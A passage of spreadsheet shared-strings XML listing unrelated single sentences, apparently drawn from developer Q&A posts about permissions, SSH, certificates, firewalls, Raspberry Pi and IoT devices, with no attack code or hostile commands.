    <t>In particular Akka Remoting does not work transparently with Network Address Translation and Load Balancers, among others.</t>
  </si>
  <si>
    <t>Using this method, a user is being presented with an editable "form" to fill in and submit in order to log into some system or service.</t>
  </si>
  <si>
    <t>The pattern, when implemented in some language/hardware combinations, can be unsafe.</t>
  </si>
  <si>
    <t>A federated data source can be queried directly even though the data is not stored locally.</t>
  </si>
  <si>
    <t>For example : First you need to activate Bluetooth and enable the discovery, then to create a socket ... stuff like that.</t>
  </si>
  <si>
    <t>But I'm not sure how to securely update my node to the new LND version 0.4.1 and I'd like some directions.</t>
  </si>
  <si>
    <t>tl;dr: does anyone know any better way to accomplish basically the same thing as aliases since mine don't work?</t>
  </si>
  <si>
    <t>Once your app has been authorized, they'll be presented with a valid OAuth 2.0 code in a text box that they'll have to copy/paste into your app.</t>
  </si>
  <si>
    <t>Throws IllegalStateException   if
  the internal player engine has not been initialized.</t>
  </si>
  <si>
    <t>If, for any reason, there is no way for torsocks to provide the Tor anonymity guarantee to your application, torsocks will force the application to quit and stop everything.</t>
  </si>
  <si>
    <t>so thought of implementing audio fingerprinting for the purpose.</t>
  </si>
  <si>
    <t>BUT I also have a white "Proof" remote and sockets, which do NOT show up, and thus, can't be controlled.</t>
  </si>
  <si>
    <t>This device will operate on a very unreliable telco environment using mobile networks.</t>
  </si>
  <si>
    <t>This is probably due to an erroneously configured claws-mail - it shouldn't have to access stuff there.</t>
  </si>
  <si>
    <t>Make sure your baud rate is set, 9600 is safest.</t>
  </si>
  <si>
    <t>Code like this:
NOTE: Here are some unsafe code that may not be published to Store.</t>
  </si>
  <si>
    <t>Try running your server with regular node process, and if it works the same way, it should error out and log out to your logfiles.</t>
  </si>
  <si>
    <t>The purpose of remote connection is nothing more than managing the device.</t>
  </si>
  <si>
    <t>I know that for security reasons Javascript is not allowed to interact with your hard drive.</t>
  </si>
  <si>
    <t>If it is unplugged for some reason will I lose data?</t>
  </si>
  <si>
    <t>So, what's the purpose to have Primary/Secondary keys?</t>
  </si>
  <si>
    <t>Obviously I have set permissions (RECORD_AUDIO) and activated on the emulator / devices but nothing.</t>
  </si>
  <si>
    <t>Finally, rewritting it in C++... Would it ensure me that it would be 100% protected ?!</t>
  </si>
  <si>
    <t>Set permissions for all back to 0 (770) because of security reasons.</t>
  </si>
  <si>
    <t xml:space="preserve">
Permissions
Make sure the permissions are set correctly ().</t>
  </si>
  <si>
    <t>To help if the photo is over exposed, use the code above.</t>
  </si>
  <si>
    <t>The key to make it work is to set the right certificates.</t>
  </si>
  <si>
    <t>Do you have configured network properly?</t>
  </si>
  <si>
    <t>As opposed to a "privileged", a "root" or an "admin" account, a limited account cannot access some potentially destructive features of a given system, such as installing/removing software (or plugins), or changing system-wide configurations.</t>
  </si>
  <si>
    <t>The permissions on the file make no difference to the user that the program runs as
When you are logged in interactively you do have permission to use the /dev/ttyACM0
When your script is running (presumably as the apache user) it does not have permission
You need to alter the permissions on the /dev/ttyACM0 
See the 2nd answer here How can I programmatically set permissions on my char device for an example of altering udev permissions so the file has the correct permissions</t>
  </si>
  <si>
    <t>The algorithm has found universal application in decoding the convolutional codes used in both CDMA and GSM digital cellular, dial-up modems, satellite, deep-space communications, and 802.11 wireless LANs.</t>
  </si>
  <si>
    <t>WSO2 IoT Server - Device Owner in COPE scenario
"You need to get the system application signed by you vendor or root the device and provide the system user privileges to the system application in order to archive the full functionality of COPE enrollment like firmware upgrade "</t>
  </si>
  <si>
    <t>A security measure designed to protect a communications system against acceptance of a fraudulent transmission or simulation by establishing the validity of a transmission, message, or originator.</t>
  </si>
  <si>
    <t>Note: A number of CRT runtime functions available with standard Windows development are not available with UWP applications due to security restrictions as well as the functionality being unsupported by WinRT.</t>
  </si>
  <si>
    <t>I want to set up a small home surveillance system that records video to a hard drive if it detects motion.</t>
  </si>
  <si>
    <t>Depending upon the design of the software supplied with your internet key, you may be able to configure it to do the same thing, so that you wouldn't have to press Connect/Disconnect each time.</t>
  </si>
  <si>
    <t>If you copy USB host in libraries you will get androidaccessory.h read private error
Copy USB host from libraries V 2 you should be able to compile successfully.</t>
  </si>
  <si>
    <t>Note that in many shields the power for the CAN transceiver is provided from the "vehicle" and not from the platform that you use (arduino, RPi) to provide better protection to the platform, and you might need to provide such power source (the arduino might do, (although the RPi can provide 5V from pin 2).</t>
  </si>
  <si>
    <t>From
write a shell script to ssh to a remote machine and execute commands:
From how do i run a script at start up (askubuntu):
You will need root privileges for any the following.</t>
  </si>
  <si>
    <t>The easiest way to resolve the problem is to set capabilities of file, it still pose security problem, but it's not as serious as setting suid of program to root.</t>
  </si>
  <si>
    <t>The Onion name refers to not only the Onion Routing concept used by Tor (which provides anonymity and resistance to traffic surveillance), but also the idea of multiple layers of security that any application should utilize.</t>
  </si>
  <si>
    <t>only companies that operate in these countries may register them (.uk does not have this restriction but .ie, Ireland, does)
sTLD - Sponsored Top Level Domains (.coop, .museum, .jobs) - These domains are for certain uses only.</t>
  </si>
  <si>
    <t>Thing Arduino is still attached to one or more principals
While deleting certificate i got this error =&gt;
The action failed because the resource conflicts with the precondition of the action.</t>
  </si>
  <si>
    <t>new SSH Keys and new API Keys)
changing timeouts in gitlab.rb
CPU and RAM usage is normal and do not exceed the limits
restarting gitlab, restarting server etc.</t>
  </si>
  <si>
    <t>I have set ARM, Remote device and gave ip address of the device, selected Universal(unencrypted protocol) in properties of the project.</t>
  </si>
  <si>
    <t>I am experimenting with locking down a device running Windows 10 Mobile enterprise, using Microsoft EnterpriseAssignedAccess CSP, most specifically AssignedAccess.xml (aka lockdown.xml).</t>
  </si>
  <si>
    <t>In the foreground, the application is capable of discovering the HM-11:
However, in the background nothing occurs past:
Here is how scanning is being set up:
/** centralManagerDidUpdateState is a required protocol method.</t>
  </si>
  <si>
    <t>My question is how do I go about configuring the adapters to work on a node like a system where they would not need to connect or disconnect from a network and be able to monitor who is connected to the network all while having safe encryption between the nodes.</t>
  </si>
  <si>
    <t>Instead, I got an error:
What I tried:
Set validation query to 
Increase time out
Completely remove Apche2+MariaDB and set them up again
And finally, none of them worked.</t>
  </si>
  <si>
    <t>I put the server name in the domain field, as I assume that the credentials parser will attempt to locate the user Administrator registered on machine AASERVER-1.</t>
  </si>
  <si>
    <t>I've tried with and without my firewall, with and without my anti-virus, with and without the USB connected, with and without a password, with and without setting the port, with and without a manual reset after loading the sketch - always the same.</t>
  </si>
  <si>
    <t>Update
It seems the .NET runtime is not able to call the older Windows Embedded Standard APIs to validate the certificate for TLS.</t>
  </si>
  <si>
    <t>Everyone says to identify it using its IP address, I tried to set a static IP address to each Raspberry Pi, but once the router resets, the IP changes.</t>
  </si>
  <si>
    <t>I'd like to add a new endpoint to my existing backend for generating time limited IOT credentials.</t>
  </si>
  <si>
    <t>Don't do this as root; instead create some setuid scripts to perform any admin-only tasks within the server and restrict the access control on those scripts.</t>
  </si>
  <si>
    <t>Safe mode may prevent the Create from driving if certain sensors detect it is unsafe to move.</t>
  </si>
  <si>
    <t>For the useful profiles like Serial Port Profile (SPP) and all arbitrary bluetooth communication you have to add an authentication chip to your Arduino.</t>
  </si>
  <si>
    <t>For reliable communication with an Android device, I would suggest that you use either the peer-to-peer mode (P2P) example or the card emulation example.</t>
  </si>
  <si>
    <t>Read section 19, Start a discovery scan, and learn how to read and decode the bytes in the discovered peripherals.</t>
  </si>
  <si>
    <t>So you either should act from another user (use sudo bash for that) or should put your repo in a different place, or should set the ownership and permissions of /var/www/html so that your regular ssh session could write to the folder (use chown and/or chmod for this).</t>
  </si>
  <si>
    <t>Sketch searches for WiFi networks, sorts them in order to RSSI, and performs connection on non-encrypted one with highest strength.</t>
  </si>
  <si>
    <t>Install library for Fingerprint sensor...
Then you should understand very important things and using this link you can get a broad knowledge.</t>
  </si>
  <si>
    <t>I prefer to take the safe and lazy route, assuming no network is necessarily secure, and weighing the convenience of accessibility against the securiry concerns.</t>
  </si>
  <si>
    <t>The exception is when you run an X11 server on your local machine and the remote system runs an X11-compatible client, and you have X forwarding enabled for the SSH connection.</t>
  </si>
  <si>
    <t>You need to configure rules on your indexes like this :
https://firebase.google.com/docs/database/security#section-defining-indexes</t>
  </si>
  <si>
    <t>Which has a good answer here..
Android 8: Cleartext HTTP traffic not permitted
and the docs:
https://developer.android.com/training/articles/security-config
I hope this helps someone who upgrades their project.</t>
  </si>
  <si>
    <t>H2Reg.exe is a command-line utility used to Register/Unregister MS Help 2.x Collections: Namespaces, Titles, Plug-ins and Filters.</t>
  </si>
  <si>
    <t>AWS WAF is a web application firewall service that monitors web requests for Amazon CloudFront distributions and restricts access to content.</t>
  </si>
  <si>
    <t>NIO is Java 'New I/O' introduced in 1.4, providing non-blocking and multiplexed network I/O; 'direct' (native) buffers; file locks and mapped files; and character set codecs.</t>
  </si>
  <si>
    <t>zssh (Zmodem SSH) is, according to its website, a program for interactively transferring files to a remote machine while using the secure  shell (ssh).</t>
  </si>
  <si>
    <t>CryptoAPI is a set of dynamically linked libraries that provides an abstraction layer which isolates programmers from the code used to encrypt the data.</t>
  </si>
  <si>
    <t>* - to avoid classloader conflicts the Java Security
API Provider name is now SC rather than BC no class names change, so
the BouncyCastleProvider class remains Bouncy, not Spongy, but moves
to the org.spongycastle.jce.provider package.</t>
  </si>
  <si>
    <t>Exception-logging is the practice of writing error and exception information to a log file or database for review or research by debuggers, administrators, developers, etc.</t>
  </si>
  <si>
    <t>ACL permissions are verified for the user's
Windows identity (if Windows authentication is enabled) or for the
Windows identity of the ASP.NET process.</t>
  </si>
  <si>
    <t>Symfony only requires two writing folders, which can be fully configured to adapt to the company's established security policy.</t>
  </si>
  <si>
    <t>In computer security, a DMZ or Demilitarized Zone is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger and untrusted network, usually the Internet.</t>
  </si>
  <si>
    <t>Higher-privilege applications are permitted to send window messages to lower-privilege processes.</t>
  </si>
  <si>
    <t>PasswordStore: abstract class intended to safely store
passwords typed by users in some kind of cache, in order to help 
LoginService to authenticate users.</t>
  </si>
  <si>
    <t>These filters help us perform the following functions:
Authentication and Security - identifying authentication requirements
for each resource and rejecting requests that do not satisfy them.</t>
  </si>
  <si>
    <t>These APIs provide a secure and flexible way for carrier-developed apps to perform these tasks and be distributed through Google Play.</t>
  </si>
  <si>
    <t>This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.</t>
  </si>
  <si>
    <t>The bookmarks, extensions, themes and plugins will all be preserved, and Chromium Portable will leave no personal information behind on the machine it is being run on.</t>
  </si>
  <si>
    <t>Istio supports managing traffic flows between microservices, enforcing access policies, and aggregating telemetry data, all without requiring changes to the microservice code.</t>
  </si>
  <si>
    <t>You can specify an IP address range for the VPC, add subnets, associate security groups, and configure route tables.</t>
  </si>
  <si>
    <t>Server Name Indication is a TLS extension benefiting virtual hosting by permitting different domain hosted on a single IP address to have a different certificate per hostname.</t>
  </si>
  <si>
    <t>Since each deployment is managed via an SSH session to the target machine, the only requirement is the ability to ssh to the target machine.</t>
  </si>
  <si>
    <t>It does one thing only: it creates URIs according to the application's route configuration in a type-safe manner.</t>
  </si>
  <si>
    <t>The device should be able to act either as a standalone wifi hotspot that devices can connect to or in the case of the presence of an existing wifi network it should connect to that network so that the user does not have to give up his internet connection in order to connect to the device.</t>
  </si>
  <si>
    <t>while developing applications based on WiringPi, which facilitates the access to GPIO but requires root to effectively enable access to the hardware.</t>
  </si>
  <si>
    <t>This is not a relative database but might do the trick if you build an intelligent system with cookie's to store an ID that is associated with a user.</t>
  </si>
  <si>
    <t>I can now issue further commands to download the questionable file using curl and perform further examination within this secure sandbox environment.</t>
  </si>
  <si>
    <t>zpaq saves regular files and directories, last-modified dates (to the nearest second), and (optionally) Windows attributes or Linux permissions.</t>
  </si>
  <si>
    <t>I'm also a long-standing member of Charcoal, the organisation responsible for the SmokeDetector spam-detecting bot.</t>
  </si>
  <si>
    <t>YES I have tried to add the remote computer's id_rsa.pub key to authorized_keys and it works, but still freezes when pushing.</t>
  </si>
  <si>
    <t>If your app lists a normal permission in its manifest, the system grants the permission automatically.</t>
  </si>
  <si>
    <t>It is usually used to target internal systems behind firewalls that are normally inaccessible to an attacker from the external network.</t>
  </si>
  <si>
    <t>CSP does the job of presenting certificates, stored in the token, to CryptoAPI.</t>
  </si>
  <si>
    <t>Its purpose is to permit a user to access multiple applications while providing their credentials (such as userid and password) only once.</t>
  </si>
  <si>
    <t>But when I access directly the repository myrepo from http://.../svn/myrepo, it does not ask for user/password, so the repository contents is exposed.</t>
  </si>
  <si>
    <t>I've been able to easily SSH to the RPi using my internal IP from the same network with no problem, but not from my external IP.</t>
  </si>
  <si>
    <t>Note: I have already setup firewall access rule for my IP.</t>
  </si>
  <si>
    <t>Note that a middleman is not needed since the master can be directly connected to slave but I want to use the data for other purpose.</t>
  </si>
  <si>
    <t>My services require access to the raspberry pi GPIO and needs privileged mode.</t>
  </si>
  <si>
    <t>I am trying to make a secure (SSL/HTTPS) API request in an Arduino environment.</t>
  </si>
  <si>
    <t>Its important to use SSL to protect the password in this case.</t>
  </si>
  <si>
    <t>Look for "SSH X11 Display Forwarding" for details on how to make this work on your setup.</t>
  </si>
  <si>
    <t>As of build 14295 Windows IoT added an internal firewall.</t>
  </si>
  <si>
    <t>Tablet Servers and Master use the Raft consensus algorithm, which ensures availability even if f replicas fail, given 2f+1 available replicas.</t>
  </si>
  <si>
    <t>The reason for this appears to be that it tries to load myserver.example/login whereas with the other configuration it goes to myserver.example/app.php/login.</t>
  </si>
  <si>
    <t>At home, I control it using Windows 10/Putty over SSH.</t>
  </si>
  <si>
    <t>i am trying to make an anti theft door notification IOT app.</t>
  </si>
  <si>
    <t>Raspberry doesn't have wifi module so the idea is let router also be access point.</t>
  </si>
  <si>
    <t>Unfortunately, this requires a browser modification because Javascript does not support UDP for security reasons.</t>
  </si>
  <si>
    <t>You could make a smartphone app, or any kind or code that can connect to SSH (all of them).</t>
  </si>
  <si>
    <t>Not sure if there is a reason why DisplayOnly can't use auth, encrypt (might have something to do with them setting security mode 3).</t>
  </si>
  <si>
    <t>The Firebase Admin SDK for Java, which is meant to be uses in JVM applications that run in a trusted environments, such as a server you control.</t>
  </si>
  <si>
    <t>This is a protected intent that can only be sent by the system.</t>
  </si>
  <si>
    <t>For example:
java
/** Authorizes the installed application to access user's protected data.</t>
  </si>
  <si>
    <t>I'm almost sure I need run debugging as root user but... how can I do that?</t>
  </si>
  <si>
    <t>network 'proxy' config is set properly.</t>
  </si>
  <si>
    <t>I  am trying working on Intel Galileo Gen 2 with Intel XDK and successfully connected galileo gen 2  with XDK manually over ethernet as its not detecting board, i have installed bonjour also.</t>
  </si>
  <si>
    <t>But I'm not sure SSH tunnel can bypass Home Router.</t>
  </si>
  <si>
    <t>make sure you have file permissions set well.</t>
  </si>
  <si>
    <t>Make sure you're running the 802.15.4 (=0x20XX) or DigiMesh firmware (0x90XX) and not the ZigBee firmware (0x40XX).</t>
  </si>
  <si>
    <t>You can use the adb connect functionality to connect to your device via WiFi for debugging and DDMS purposes.</t>
  </si>
  <si>
    <t>Below the devices and their ip(s):
Node configuration:
I execute dispynode in my node with:
sudo dispynode.py -i 192.168.1.105
Where:
sudo to make sure there won't problem about permission
-i 192.168.1.105 to tell the node which address set up for communication (documentation)
The console output:
2015...12:21 - dispynode - dispynode version 4.5
2015...12:21 - dispynode - serving 1 cpus at 192.168.1.105:51348
I said: "Seems good!"</t>
  </si>
  <si>
    <t>Now I know python is behaving properly because this code exits with ctrl-C
and when I open another virtual console with alt-F2, login and try 
sudo kill -9 fbi
of course the python process just restarts it.</t>
  </si>
  <si>
    <t>From "Obscure Facts About HTML5 LocalStorage": LocalStorage values created in "incognito" mode are isolated, and are destroyed once the private browsing session is closed.</t>
  </si>
  <si>
    <t>However, apps targeting Android Q by default (as well as
  apps that opt into the change) are given a sandboxed view into
  external storage.</t>
  </si>
  <si>
    <t>After passing the credentials I am able to get the data from the machine as client if the buffer storage of the machine is empty (clean).</t>
  </si>
  <si>
    <t>But there is an 
"Unknown USB Device (Device Descriptor Request Failed)" 
line in the Universal Serial Bus controllers section.</t>
  </si>
  <si>
    <t>When I tried to push on rpilocal2 and on rpigitlocal2 I got the following error message:
git push rpigitlocal2 master
git@192.168.1.125's password: 
fatal: 'feralheart/leltar.git' does not appear to be a git repository
fatal: Could not read from remote repository.</t>
  </si>
  <si>
    <t>I did it in Update1 but according to documentation online: Monitoring Devices Using Location Based Services
 bloc is missing in cdm-config.xml file of Update7.</t>
  </si>
  <si>
    <t>Fairly simple - if you have a wireless home network, then your device could be plugged in to your router with a physical wire - as long as your Android device and your microprocessor are on the same network.</t>
  </si>
  <si>
    <t>On Windows machine
Create a shared folder with very insecure permissions until you get set up and working properly - you can always close things down and tighten things up later.</t>
  </si>
  <si>
    <t>The DeviceInfo field on devices includes a descriptive location field which is just a string and could technically be set to the IP address of a device... this might be a bit far-fetched though.</t>
  </si>
  <si>
    <t>https://developer.android.com/things/preview/releases.html
Another way to force permissions to be given, is to start your app with  and the -g flag (this will be default in a future version of AndroidStudio)</t>
  </si>
  <si>
    <t>Alternatively, use systemctl to start the service
If your Pi is connected to the internet, you should change its default password to ensure that it remains secure.</t>
  </si>
  <si>
    <t>Those are expensive, so if you want to go for the cheap you can take a look at the software alternative I proposed here, which exploits port forwarding to monitor the traffic.</t>
  </si>
  <si>
    <t>I would recommend using strncpy() for safety (so you don't copy more characters than you have space for), and manually set the last element of each string to null.</t>
  </si>
  <si>
    <t>The Windows App Certification Kit (WACK) contains a number of tests that can help ensure that your app is ready to be published on the Windows Store.</t>
  </si>
  <si>
    <t>eCryptfs (the Enterprise Cryptographic Filesystem) is a POSIX-compliant encrypted filesystem that has been part of the mainline Linux Kernel since version 2.6.19.</t>
  </si>
  <si>
    <t>The original limitations addressed were related to running CVS server on Windows and handling filenames for case-insensitive platforms.</t>
  </si>
  <si>
    <t>The low-level access allows the direct manipulation of DNS messages and records, as well as allowing additional resolver properties to be set.</t>
  </si>
  <si>
    <t>Files on a laptop carried overseas do not need to be opened overseas and foreign persons do not need to have actual access to USML items on computer networks for a breach to occur.</t>
  </si>
  <si>
    <t>The Windows App Certification Kit contains a number of tests that can help ensure that your app is ready to be published on the Windows Store.</t>
  </si>
  <si>
    <t>Optimistic concurrency improves performance because no locking of records is required, and locking of records requires additional server resources.</t>
  </si>
  <si>
    <t>For example, an application with PHP and MySQL has access to environment variables that expose the PHP path information, including the host, port, user name, and password necessary for connecting to the MySQL database.</t>
  </si>
  <si>
    <t>This process is transparent to the user and if torsocks detects any communication that can't go through the Tor network such as UDP traffic, for instance, the connection is denied.</t>
  </si>
  <si>
    <t>Before Universal Links, the primary mechanism to open up an app when it was installed was by trying to redirect to an apps URI scheme (registered in the apps PLIST like so) in Safari.</t>
  </si>
  <si>
    <t>Softaculous applications typically create tables in a database, install software, adjust permissions, and modify web server configuration files.</t>
  </si>
  <si>
    <t>Update
I actually found a list with many username/password combinations for different distributions often used on Raspberry.</t>
  </si>
  <si>
    <t>Events logged using a logger configured with such a sink will be sent to a file on disk which is automatically rolled over on a daily basis.</t>
  </si>
  <si>
    <t>In both cases, that is a security hole (which you might afford on a dedicated internal webserver, accessible only from your home network).</t>
  </si>
  <si>
    <t>A traditional pipe is "unnamed" because it exists anonymously and persists only for as long as the process is running.</t>
  </si>
  <si>
    <t>If you want to be safe, just make sure that you can buffer up a few milliseconds of data on the device side so you aren't losing any data.</t>
  </si>
  <si>
    <t>The access decisions are made through the standard java.security.Policy object.</t>
  </si>
  <si>
    <t>Bots
Telegram Bots are programmed accounts without a phone number.</t>
  </si>
  <si>
    <t>Once authorized, clients can view and access the data through their local systems much like they'd access it from an internal disk drive</t>
  </si>
  <si>
    <t>I reason i want to do it is because i am unable to perform a SSH connection with my Raspberry Pi  near a swimming pool.</t>
  </si>
  <si>
    <t>Maybe you want to avoid SSH-tunnelling option and connect directly.</t>
  </si>
  <si>
    <t>Like all user input, it should be considered "unsafe" in the sense that it can contain anything (e.g., it could be maliciously formed on purpose).</t>
  </si>
  <si>
    <t>The reason is the firewall rules for connection security policy.</t>
  </si>
  <si>
    <t>First, make sure you have an SSH key generated on your development machine.</t>
  </si>
  <si>
    <t>A public key is made freely available to anyone who might want to send you a message.</t>
  </si>
  <si>
    <t>The former is in charge of cookie storage and the latter makes decision on acceptance/rejection.</t>
  </si>
  <si>
    <t>This option must be presented to customers before you require them to enter any other data.</t>
  </si>
  <si>
    <t>Note that server configuration questions may be a better fit on Server Fault.</t>
  </si>
  <si>
    <t>The commands seem to work fine if I SSH into the PI and run them as root.</t>
  </si>
  <si>
    <t>I run the container in privileged mode using the --privileged flag in the docker run command.</t>
  </si>
  <si>
    <t>I cannot say it is more secure but it will make it harder to discover.</t>
  </si>
  <si>
    <t>Consider the case where a device remotely controls the door of a truck.</t>
  </si>
  <si>
    <t>Strategies to protect an application / software from being copied or used without permission.</t>
  </si>
  <si>
    <t>This Apache 2.3 module allows the use of an HTML login form to restrict access by looking up users in the given providers.</t>
  </si>
  <si>
    <t>RootTools is a library with utilities for running commands as root from within Android Java Code.</t>
  </si>
  <si>
    <t>The sensitive functions run in a privileged server environment.</t>
  </si>
  <si>
    <t>This will then allow you to intercept the paint messages of desired control.</t>
  </si>
  <si>
    <t>Is there a way to protect this file or restrict the access to it by ANY other process?</t>
  </si>
  <si>
    <t>But is there a way to also encrypt any arbitrary folders outside of home?</t>
  </si>
  <si>
    <t>This is not for QEMU debugging this for guest system debugging.</t>
  </si>
  <si>
    <t>Keep in mind security requirements to your network environment.</t>
  </si>
  <si>
    <t>Much finer control of access rights can be defined using mutators and accessors.</t>
  </si>
  <si>
    <t>I have been using rasbian as the OS, and I am having several problems with root access being denied.</t>
  </si>
  <si>
    <t>I have successfully authenticated and have a client_secret.json file on my machine.</t>
  </si>
  <si>
    <t>I configured hostapd to make an Access Point Wi-Fi network on my raspberry pi... everything works fine.</t>
  </si>
  <si>
    <t>I am debugging the remotely attached rpi3 with gdbserver.</t>
  </si>
  <si>
    <t>Is there a way I can connect to a network (Test1) than host a network with a different SSID and Password and make all the traffic go through Test1.</t>
  </si>
  <si>
    <t>As root, issue:
to install the server.</t>
  </si>
  <si>
    <t>https://dl.espressif.com/dl/package_esp32_index.json
Note: If you have existing URLs don't delete them otherwise you will lose access.</t>
  </si>
  <si>
    <t>The displays on this list is verified by Microsoft,they can work fine with Windows IoT Core.</t>
  </si>
  <si>
    <t>While you need use IoT Hub SAS token it can grant access control and permissions.</t>
  </si>
  <si>
    <t>I can SSH and FTP into my RPi perfectly.</t>
  </si>
  <si>
    <t>The device is a passive one and remotely controlled.</t>
  </si>
  <si>
    <t>I have an account and created device and SAS with TTL as required.</t>
  </si>
  <si>
    <t>I also made sure sshpass was installed, which it is.</t>
  </si>
  <si>
    <t>Make sure you have installed CA Certificate on your device.</t>
  </si>
  <si>
    <t>The name of the file is given in the .htaccess configuration, and can be anything, but ".htpasswd" is the canonical name.</t>
  </si>
  <si>
    <t>Context:
I would like to add a custom library to a piece of Arduino code in the Arduino 1.5.7 IDE to ensure code is decentralized and readable
Attempted solution:
I make a folder called "mathsfunctions".</t>
  </si>
  <si>
    <t>The "cannot create" errors after I ran the "bash configure.bash" file the second time were permission errors due to my having run the initial git cloning as root but the subsequent commands as my normal user.</t>
  </si>
  <si>
    <t>You want to talk to that webcam, from which you don't know the protocol.</t>
  </si>
  <si>
    <t>--I'm using the Raspbian wheezy Debian distro and I don't think that comes with a firewall.</t>
  </si>
  <si>
    <t>It works as root, but not as regular user.</t>
  </si>
  <si>
    <t>Hostapd connection and handshake is working fine.</t>
  </si>
  <si>
    <t>External access has not been set up yet.</t>
  </si>
  <si>
    <t>I have a raspberry pi, and I set up apache and tomcat and ssh.</t>
  </si>
  <si>
    <t>HOWEVER - if I unplug the Ethernet Shield it works fine.</t>
  </si>
  <si>
    <t>I want to use my raspi cam modul to scan QR codes.</t>
  </si>
  <si>
    <t>I have set so everyone has all permissions.</t>
  </si>
  <si>
    <t>There is an authentification window, I'm typing the user and password that samba knows.</t>
  </si>
  <si>
    <t>I have it set up so I can ssh into it with putty from my windows machine.</t>
  </si>
  <si>
    <t>I am not very sure but I believe there is no login and password on my GPRS setting.</t>
  </si>
  <si>
    <t>I have to login on my device as root using sshd which works out of the box.</t>
  </si>
  <si>
    <t>I want to set raspberrypi network ssid and password over Android application.</t>
  </si>
  <si>
    <t>I try to mount a folder of my wd my cloud NAS in raspbian, but I always get Permission denied.</t>
  </si>
  <si>
    <t>I could connect it from ssh and file zilla(ftp) LOCALLY.</t>
  </si>
  <si>
    <t>When it has frozen i can't ssh to the box or in any way acces it remotely.</t>
  </si>
  <si>
    <t>To use Apache as Proxy for Websockets ("ProxyPass") Apache Module mod_proxy_wstunnel is required.</t>
  </si>
  <si>
    <t>Mediacodec decoder configuration
AudioTrack Configuration</t>
  </si>
  <si>
    <t>I'm able to ssh into the RPi from the server(it's on a remote network).</t>
  </si>
  <si>
    <t>I am now trying to access it externally from the network.</t>
  </si>
  <si>
    <t>The bluetooth scanning requires sudo because it use 4.0 BLE.</t>
  </si>
  <si>
    <t>Is there some way how to control web browser URL with infrared remote?</t>
  </si>
  <si>
    <t>After that I have set the permissions and now it should work.</t>
  </si>
  <si>
    <t>I want to implement HMAC256 using Arduino IDE 1.6.7 installed on Win.</t>
  </si>
  <si>
    <t>Is there any way i could remotely access the application.</t>
  </si>
  <si>
    <t>And the permissions on the FTP server are all set at 777.</t>
  </si>
  <si>
    <t>I can ssh into rp2, and i can see that indeed tightvnc is not running, but!</t>
  </si>
  <si>
    <t>When I run the script manually after the login it works just fine.</t>
  </si>
  <si>
    <t>I have a raspberry 3 connected by ethernet and wifi to my router.</t>
  </si>
  <si>
    <t>However when I allow 'auto eth0' then it does not configure the wlan0.</t>
  </si>
  <si>
    <t>And second, (quiet important actually) how would the authentication work?</t>
  </si>
  <si>
    <t>To enable and use Alexa, authentication is performed using Login With Amazon.</t>
  </si>
  <si>
    <t>no login required.</t>
  </si>
  <si>
    <t>The problem is this API requires authentication.</t>
  </si>
  <si>
    <t>But when I configure mysql to use this certificate it doesn't work.</t>
  </si>
  <si>
    <t>OUTPUT BUFFER 2
331 Password required for anonymous.</t>
  </si>
  <si>
    <t>First, I did the configuration to connect without password to the second RPI from the first one.</t>
  </si>
  <si>
    <t>However, there is no way to retrieve your certificate using the ARN or Certificate ID that I can see.</t>
  </si>
  <si>
    <t>I reinstalled my Raspberry, and I can access it with SSH, but it can't go outside of the router.</t>
  </si>
  <si>
    <t>If I am right the CWMODE should be 3 in order to be able to connect to a Wi-Fi network.</t>
  </si>
  <si>
    <t>Just updated with password and network name.</t>
  </si>
  <si>
    <t>I'm not sure, though, and do not see any suspicious values here.</t>
  </si>
  <si>
    <t>I am also running passwordless sudo.</t>
  </si>
  <si>
    <t>In order to get it, i also tried Sigined the APK with the system certificate.</t>
  </si>
  <si>
    <t>Plus the RPI's will likely be behind a firewall.</t>
  </si>
  <si>
    <t>Also ssh with my desktop works fine, too.</t>
  </si>
  <si>
    <t>In order to access it I need to allow users to access it via a network.</t>
  </si>
  <si>
    <t>However i'm able to fetch data without authentication.</t>
  </si>
  <si>
    <t>I/Binder:950_3: type=1400 audit(0.0:78): avc: denied { read } for name="/" dev="tmpfs" ino=7244 scontext=u:r:priv_app:s0:c512,c768 tcontext=u:object_r:device:s0 tclass=dir permissive=1
09-19 17:18:32.129 1129-1129/?</t>
  </si>
  <si>
    <t>System.UnauthorizedAccessException: Access is denied.</t>
  </si>
  <si>
    <t>Safe version:
Unsafe version:
If I am doing it wrong fundamentally please let me know why and how I could avoid that.</t>
  </si>
  <si>
    <t>Do I have to set some permissions or...</t>
  </si>
  <si>
    <t>A general Internet connectivity over eth0 is not possible, so I have to use eth1 on the Pi.</t>
  </si>
  <si>
    <t>How we can revoke an old device certificate when a new certificate installed on the same device?</t>
  </si>
  <si>
    <t>When I try to login with PuTTY, it says "Access Denied".</t>
  </si>
  <si>
    <t>HRESULT:0x80070005 Access is denied.</t>
  </si>
  <si>
    <t>Update
When I SSH from my Linux machine to the Pi and run the code, it works.</t>
  </si>
  <si>
    <t>There is no firewall.</t>
  </si>
  <si>
    <t>It works fine and can login to the database.</t>
  </si>
  <si>
    <t>Which protocol I should be filtering?</t>
  </si>
  <si>
    <t>I also installed the certificate on the device.</t>
  </si>
  <si>
    <t>Set to "Off" to deactivate.</t>
  </si>
  <si>
    <t>Turned off it says it requires a login.</t>
  </si>
  <si>
    <t>Did somebody do voice recognition with Bluetooth Headset in Raspberry Pi 3 B+, is it Possible?</t>
  </si>
  <si>
    <t>I retrieve json data from a webserver with "https and digest authentication".</t>
  </si>
  <si>
    <t>Here is also the query I used to grant my user access to the DB.</t>
  </si>
  <si>
    <t>using bluetoothctl I can view, pair, and trust my bluetooth device.</t>
  </si>
  <si>
    <t>I tried both cmd and Power Shell, both with administrator rights and without.</t>
  </si>
  <si>
    <t>CategoryInfo: NotSpecified: (ERROR: Access is denied.</t>
  </si>
  <si>
    <t>I also installed oauth2 in the same way.</t>
  </si>
  <si>
    <t>Now I use a Firestore database by configuring security.</t>
  </si>
  <si>
    <t>I get an exception if i run this Code on a RPI with W10iotCore:
like 
System.UnauthorizedAccessException: Access is denied.</t>
  </si>
  <si>
    <t>I have a  on which i have installed certbot to use ssl.</t>
  </si>
  <si>
    <t>I'd like to prototype a device where I can configure Raspberry Pi's network without having to connect monitor and keyboard.</t>
  </si>
  <si>
    <t>W/System.err: Permission denied, please try again.</t>
  </si>
  <si>
    <t>I wonder how can I use Raspberry Pi to stimulate IoT devices traffics.</t>
  </si>
  <si>
    <t>I am trying to update my firmware on NodeMCU through OTA.</t>
  </si>
  <si>
    <t>because the access is denied.</t>
  </si>
  <si>
